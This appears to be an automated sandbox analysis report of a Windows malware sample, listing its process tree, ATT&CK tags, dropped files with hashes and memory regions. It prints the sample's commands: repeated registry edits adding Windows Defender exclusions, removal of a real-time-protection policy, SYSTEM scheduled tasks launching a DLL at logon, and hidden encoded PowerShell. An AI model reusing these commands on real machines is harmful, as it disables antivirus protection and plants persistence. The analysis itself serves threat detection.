C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\OrbPdMUPlnYWuuDN\IZsrEunH\nEukBecksDsrAYPv.wsf"2⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\OrbPdMUPlnYWuuDN\IZsrEunH\nEukBecksDsrAYPv.wsf"2⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDvErlGsJ" /SC once /ST 05:00:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDvErlGsJ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDvErlGsJ"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PihIjSYIYOWYivaIO"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PihIjSYIYOWYivaIO"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PihIjSYIYOWYivaIO2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PihIjSYIYOWYivaIO2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "uBIqNqVTLsdVwtoMO"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uBIqNqVTLsdVwtoMO"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "uBIqNqVTLsdVwtoMO2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uBIqNqVTLsdVwtoMO2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zufPyHRvXFwOAoMLceE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zufPyHRvXFwOAoMLceE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zufPyHRvXFwOAoMLceE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zufPyHRvXFwOAoMLceE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ALSnKDtOkAsKnYIkHVn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ALSnKDtOkAsKnYIkHVn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ALSnKDtOkAsKnYIkHVn2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ALSnKDtOkAsKnYIkHVn2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\PKitbTPXU\lwrzhv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fErPICTAIBeQfSA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iyUHVhEGVwjqNkM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iyUHVhEGVwjqNkM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iyUHVhEGVwjqNkM2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iyUHVhEGVwjqNkM2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oRuAcxXUHxbxlS"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oRuAcxXUHxbxlS"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PTILZxjmSMqDI"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PTILZxjmSMqDI"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PTILZxjmSMqDI2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PTILZxjmSMqDI2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fErPICTAIBeQfSA2" /F /xml "C:\Program Files (x86)\PKitbTPXU\oMnXPgn.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fErPICTAIBeQfSA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fErPICTAIBeQfSA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DHYuWKgDMKXBLX" /F /xml "C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YnGKDWXrXurgq2" /F /xml "C:\ProgramData\jbMfBZnRCYwXWnVB\yDOGyZX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uBIqNqVTLsdVwtoMO2" /F /xml "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\jSWGjfx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ALSnKDtOkAsKnYIkHVn2" /F /xml "C:\Program Files (x86)\ujRQKhsomqXgC\YfXWsUL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 2682⤵
- Program crash
-
C:\Windows\system32\taskeng.exetaskeng.exe {1ABF180B-9726-4A10-8976-67692C051CDA} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\jSWGjfx.xmlFilesize
2KB
MD5eda91a0f391eb42e15dfdbfd829837cb
SHA1b25730ff454a76132a27f873c9e4175785801a30
SHA256dede05112c969db28dca57b8691fd9da2b5cd40942a8e6a3fdf4d09d65cc8d0e
SHA512ef4b8d293cfc6b482f1bb9e704bab62b796a048425c6fc27624e2b5e4b214c6aaf7caed0f43399b70b186ca9bfb4f0f39eee2b372f04839b524f8d5f41331f04
-
C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xmlFilesize
2KB
MD58e7fb4e07f24fe3167b8322ca19f2c15
SHA1548b70484f8b36ab228979a36644dd80d7419625
SHA25676139a976e7cc1b392c856109554184e6d0d6fd3d9b8d7706043e9b6f764cf54
SHA5129e3ded44410598ffccfa504b1b7c0c27ecb972a8c32b0f1d1b5c433b419ee4e65e80d8a59d40c347607e9c1a0a11fdd7021c8012ac1793463178a7e57d0e2bff
-
C:\Program Files (x86)\PKitbTPXU\oMnXPgn.xmlFilesize
2KB
MD5aa8e2a43be01988ab61cadae768beab2
SHA143dcc3879d9db299db64f2b22c10eee528f4b85f
SHA25660d0045073143f8187ba36e8c891eda54b001ed62c1fd48e18410370339f8d1b
SHA51256e54f2628587bd54792f8eae75319478022c02727552007f850a62788b9d7ac0b1c21feca7142644f549943be91f4c569673595aa8351c1200f3cc86159cc00
-
C:\Program Files (x86)\ujRQKhsomqXgC\YfXWsUL.xmlFilesize
2KB
MD5868ef0349be864a6facc3fc454ead3ab
SHA1f44dd664ce7d33c82d66292ab5bcbc2485bd2daf
SHA25683c74debb70dae9bbc540d50ab2334a3a1145d6ded3aa2839ac0ca81f41d28bf
SHA512fa23cb8869a09aa641ba3ba6d29916c448627bfa77abdc806cadb32143fb674e64fa3c26cc1bba08ab76d756f0787be72cc30f0bf47380b12c17813bb623e2a0
-
C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpiFilesize
641KB
MD5ac50bd0140816e5b418804edbc3e1872
SHA1efe2e39b9b58f41bb83a1eb2904b0f8ed5845bee
SHA2565c1da4d6a7b24bfc09b8cc44cbfa3b0c050a3fdd22a356900cae35ea1aa832ad
SHA512b9a1777f9acba104812ced2267c47cc83273cd7450fc7b57928804d6528e4098d8afc3c6be6bb02d39bf3d410292a3dfd90b220fbc01a311824da50ab50be156
-
C:\ProgramData\jbMfBZnRCYwXWnVB\yDOGyZX.xmlFilesize
2KB
MD5f8689470aa0280ae17c8a02774f07de1
SHA178122f485a6984a8c3a5720abe7192bcc3790f53
SHA256ebe665f769a13bdb1492142ccfd60a00bc59be7152cb808f71faebf676987f8f
SHA51247bfc2b55d5e867456f87fb86f2f591e3fe3ae54ef2d2bcc006a4e91ce0103f0a326d09d79c90e5038f67164461faf3f10c03c7a4122ddd17108fd2ce05e2d47
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\_locales\en\messages.jsonFilesize
150B
MD533292c7c04ba45e9630bb3d6c5cabf74
SHA13482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA2569bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA5122439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\_locales\pt_BR\messages.jsonFilesize
161B
MD55c5a1426ff0c1128c1c6b8bc20ca29ac
SHA10e3540b647b488225c9967ff97afc66319102ccd
SHA2565e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA5121f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5b37e97501563e623f97a96d35697d0dc
SHA1b4f9bb5576fade006ef1fcec299f94a57ef10e6c
SHA2565738c5af409cdab1be8c947d1506733b53757145b697a2b4ee9181591de493fa
SHA512966c51a69c9f2ec41877033711158ec24dca88359ab41b50d2fb15a1f41f372134f093aa2104e090f88d35a70003831d836fb27f19c6a404e4fb731baeb1c769
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQ3OO131FZAU599IQTD0.tempFilesize
7KB
MD58f171088924e815e20baa0530ee80240
SHA13688b84f9bb8c7556b0121b413cfe04a9545c1d6
SHA256ef2f58da2a3f67df329277c53da59228b71345c21b453b5392113eb4c1c61103
SHA512eb6881608c79001a07a56d57fea619b9d9c5332757ebe1b15f62c8080dd38e220d4886f7ae81464040ef6dc00d095ca876be01b68df94161700297bcf9258e73
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YR0879EQDU4B5W6WZF9D.tempFilesize
7KB
MD5838c686a6d7375bca89fe219cd76e438
SHA10326ba5340de4ad42853b3035444cb8aa9d98065
SHA25637b98532a6492750ed8d3fb6a54404f15f4b6d43d1258e020eadc19e37d30013
SHA512efc24f5f64454ef1d0dd9fbcabcb5e92422e6990aeea8410af7783ad007f52d17a246bfdcf4caa686c37d2cf5a1afe30a18a1c7fe4d8379946370741007a42e7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5aee1ca77323a663cd0f73dab6cd324df
SHA1b3742864f08d92b8aa682c6a6d5fa68b035f2f69
SHA256e010e6f0b8e54664aecdf43295666a23d566dc297e0ad37b5d335094a37bdc69
SHA512e1c49f21fe4885def24d6bf44cd0d5c6557ac12a7bcb064e31a5f406201b2ed38e0915856dac58aa8a0470ff8fa564864f0234763722dd9807cd2d665abacb33
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ox017b3g.default-release\prefs.jsFilesize
6KB
MD519666b4dfb8e18cc31339b7bb37c7303
SHA1bdbe49fda66ec500fd8e7dc38dad8acf09115bed
SHA25669b892448f4d0dd5384866ce1e8383cb0a95e6bde435e75068628546fa00c618
SHA512d054f73a863c5d596e829a7553ff21951e213d934b67730f8af199388e7f29b3d2aed301e4664605b5ae33a3d7939d87f581a10a2c8d5b9aed56035b521e7839
-
C:\Windows\Temp\OrbPdMUPlnYWuuDN\IZsrEunH\nEukBecksDsrAYPv.wsfFilesize
9KB
MD529fe03fcb9d59280fb706177eeb62f47
SHA1be42316ea918a318164cc0579721c20fc5bcbdac
SHA256e3dce70cfd7e03ae9b201333139fd25664960615080ce695ceab6ed2abab29ee
SHA512dce95c767ee0dacbb979fa1c134d150b07a75671fff091c02e9f1f5f84a470795ebe5200ccdbf1ea591b448a2bfd582ad26944b583782565eb5e62e1e6b09a4a
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1556-41-0x000000001B7B0000-0x000000001BA92000-memory.dmpFilesize
2.9MB
-
memory/1924-31-0x0000000076C90000-0x0000000076DAF000-memory.dmpFilesize
1.1MB
-
memory/1924-32-0x0000000076DB0000-0x0000000076EAA000-memory.dmpFilesize
1000KB
-
memory/1976-53-0x0000000003F90000-0x0000000004015000-memory.dmpFilesize
532KB
-
memory/1976-89-0x0000000003DB0000-0x0000000003E15000-memory.dmpFilesize
404KB
-
memory/1976-2-0x0000000010000000-0x00000000105D3000-memory.dmpFilesize
5.8MB
-
memory/2516-12-0x00000000021D0000-0x00000000021D8000-memory.dmpFilesize
32KB
-
memory/2516-11-0x000000001B630000-0x000000001B912000-memory.dmpFilesize
2.9MB
-
memory/2632-23-0x0000000001EE0000-0x0000000001EE8000-memory.dmpFilesize
32KB
-
memory/2632-22-0x000000001B770000-0x000000001BA52000-memory.dmpFilesize
2.9MB